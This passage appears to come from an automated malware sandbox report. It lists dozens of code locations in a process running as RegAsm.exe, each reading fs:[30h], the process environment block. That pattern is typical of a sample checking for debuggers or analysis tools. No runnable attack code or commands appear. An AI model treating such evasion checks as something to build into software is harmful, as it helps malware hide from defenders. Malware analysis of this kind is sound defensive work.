            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC035C mov eax, dword ptr fs:[00000030h]6_2_02FC035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC035C mov ecx, dword ptr fs:[00000030h]6_2_02FC035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC035C mov eax, dword ptr fs:[00000030h]6_2_02FC035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC035C mov eax, dword ptr fs:[00000030h]6_2_02FC035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030092A6 mov eax, dword ptr fs:[00000030h]6_2_030092A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030092A6 mov eax, dword ptr fs:[00000030h]6_2_030092A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030092A6 mov eax, dword ptr fs:[00000030h]6_2_030092A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030092A6 mov eax, dword ptr fs:[00000030h]6_2_030092A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC2349 mov eax, dword ptr fs:[00000030h]6_2_02FC2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3D34C mov eax, dword ptr fs:[00000030h]6_2_02F3D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3D34C mov eax, dword ptr fs:[00000030h]6_2_02F3D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F37330 mov eax, dword ptr fs:[00000030h]6_2_02F37330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6F32A mov eax, dword ptr fs:[00000030h]6_2_02F6F32A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3C310 mov ecx, dword ptr fs:[00000030h]6_2_02F3C310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030152E2 mov eax, dword ptr fs:[00000030h]6_2_030152E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F60310 mov ecx, dword ptr fs:[00000030h]6_2_02F60310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC930B mov eax, dword ptr fs:[00000030h]6_2_02FC930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC930B mov eax, dword ptr fs:[00000030h]6_2_02FC930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC930B mov eax, dword ptr fs:[00000030h]6_2_02FC930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7A30B mov eax, dword ptr fs:[00000030h]6_2_02F7A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7A30B mov eax, dword ptr fs:[00000030h]6_2_02F7A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7A30B mov eax, dword ptr fs:[00000030h]6_2_02F7A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3C0F0 mov eax, dword ptr fs:[00000030h]6_2_02F3C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F820F0 mov ecx, dword ptr fs:[00000030h]6_2_02F820F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3A0E3 mov ecx, dword ptr fs:[00000030h]6_2_02F3A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F650E4 mov eax, dword ptr fs:[00000030h]6_2_02F650E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F650E4 mov ecx, dword ptr fs:[00000030h]6_2_02F650E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03000115 mov eax, dword ptr fs:[00000030h]6_2_03000115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC60E0 mov eax, dword ptr fs:[00000030h]6_2_02FC60E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F480E9 mov eax, dword ptr fs:[00000030h]6_2_02F480E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC20DE mov eax, dword ptr fs:[00000030h]6_2_02FC20DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F690DB mov eax, dword ptr fs:[00000030h]6_2_02F690DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov ecx, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov ecx, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov ecx, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov ecx, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C0 mov eax, dword ptr fs:[00000030h]6_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBD0C0 mov eax, dword ptr fs:[00000030h]6_2_02FBD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBD0C0 mov eax, dword ptr fs:[00000030h]6_2_02FBD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03015152 mov eax, dword ptr fs:[00000030h]6_2_03015152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD80A8 mov eax, dword ptr fs:[00000030h]6_2_02FD80A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F45096 mov eax, dword ptr fs:[00000030h]6_2_02F45096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6D090 mov eax, dword ptr fs:[00000030h]6_2_02F6D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6D090 mov eax, dword ptr fs:[00000030h]6_2_02F6D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7909C mov eax, dword ptr fs:[00000030h]6_2_02F7909C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4208A mov eax, dword ptr fs:[00000030h]6_2_02F4208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3D08D mov eax, dword ptr fs:[00000030h]6_2_02F3D08D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov ecx, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51070 mov eax, dword ptr fs:[00000030h]6_2_02F51070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6C073 mov eax, dword ptr fs:[00000030h]6_2_02F6C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBD070 mov ecx, dword ptr fs:[00000030h]6_2_02FBD070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC106E mov eax, dword ptr fs:[00000030h]6_2_02FC106E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FE705E mov ebx, dword ptr fs:[00000030h]6_2_02FE705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FE705E mov eax, dword ptr fs:[00000030h]6_2_02FE705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F42050 mov eax, dword ptr fs:[00000030h]6_2_02F42050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B052 mov eax, dword ptr fs:[00000030h]6_2_02F6B052
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC6050 mov eax, dword ptr fs:[00000030h]6_2_02FC6050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030061C3 mov eax, dword ptr fs:[00000030h]6_2_030061C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030061C3 mov eax, dword ptr fs:[00000030h]6_2_030061C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030151CB mov eax, dword ptr fs:[00000030h]6_2_030151CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3A020 mov eax, dword ptr fs:[00000030h]6_2_02F3A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3C020 mov eax, dword ptr fs:[00000030h]6_2_02F3C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5E016 mov eax, dword ptr fs:[00000030h]6_2_02F5E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5E016 mov eax, dword ptr fs:[00000030h]6_2_02F5E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5E016 mov eax, dword ptr fs:[00000030h]6_2_02F5E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5E016 mov eax, dword ptr fs:[00000030h]6_2_02F5E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030161E5 mov eax, dword ptr fs:[00000030h]6_2_030161E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC4000 mov ecx, dword ptr fs:[00000030h]6_2_02FC4000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FE71F9 mov esi, dword ptr fs:[00000030h]6_2_02FE71F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F701F8 mov eax, dword ptr fs:[00000030h]6_2_02F701F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F651EF mov eax, dword ptr fs:[00000030h]6_2_02F651EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F451ED mov eax, dword ptr fs:[00000030h]6_2_02F451ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7D1D0 mov eax, dword ptr fs:[00000030h]6_2_02F7D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7D1D0 mov ecx, dword ptr fs:[00000030h]6_2_02F7D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE1D0 mov eax, dword ptr fs:[00000030h]6_2_02FBE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE1D0 mov eax, dword ptr fs:[00000030h]6_2_02FBE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE1D0 mov ecx, dword ptr fs:[00000030h]6_2_02FBE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE1D0 mov eax, dword ptr fs:[00000030h]6_2_02FBE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE1D0 mov eax, dword ptr fs:[00000030h]6_2_02FBE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300903E mov eax, dword ptr fs:[00000030h]6_2_0300903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300903E mov eax, dword ptr fs:[00000030h]6_2_0300903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300903E mov eax, dword ptr fs:[00000030h]6_2_0300903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300903E mov eax, dword ptr fs:[00000030h]6_2_0300903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5B1B0 mov eax, dword ptr fs:[00000030h]6_2_02F5B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF11A4 mov eax, dword ptr fs:[00000030h]6_2_02FF11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF11A4 mov eax, dword ptr fs:[00000030h]6_2_02FF11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF11A4 mov eax, dword ptr fs:[00000030h]6_2_02FF11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF11A4 mov eax, dword ptr fs:[00000030h]6_2_02FF11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03015060 mov eax, dword ptr fs:[00000030h]6_2_03015060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC019F mov eax, dword ptr fs:[00000030h]6_2_02FC019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC019F mov eax, dword ptr fs:[00000030h]6_2_02FC019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC019F mov eax, dword ptr fs:[00000030h]6_2_02FC019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC019F mov eax, dword ptr fs:[00000030h]6_2_02FC019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3A197 mov eax, dword ptr fs:[00000030h]6_2_02F3A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3A197 mov eax, dword ptr fs:[00000030h]6_2_02F3A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3A197 mov eax, dword ptr fs:[00000030h]6_2_02F3A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F97190 mov eax, dword ptr fs:[00000030h]6_2_02F97190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFC188 mov eax, dword ptr fs:[00000030h]6_2_02FFC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFC188 mov eax, dword ptr fs:[00000030h]6_2_02FFC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F80185 mov eax, dword ptr fs:[00000030h]6_2_02F80185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F172 mov eax, dword ptr fs:[00000030h]6_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD9179 mov eax, dword ptr fs:[00000030h]6_2_02FD9179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F46154 mov eax, dword ptr fs:[00000030h]6_2_02F46154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F46154 mov eax, dword ptr fs:[00000030h]6_2_02F46154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3C156 mov eax, dword ptr fs:[00000030h]6_2_02F3C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD8158 mov eax, dword ptr fs:[00000030h]6_2_02FD8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F47152 mov eax, dword ptr fs:[00000030h]6_2_02F47152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030060B8 mov eax, dword ptr fs:[00000030h]6_2_030060B8
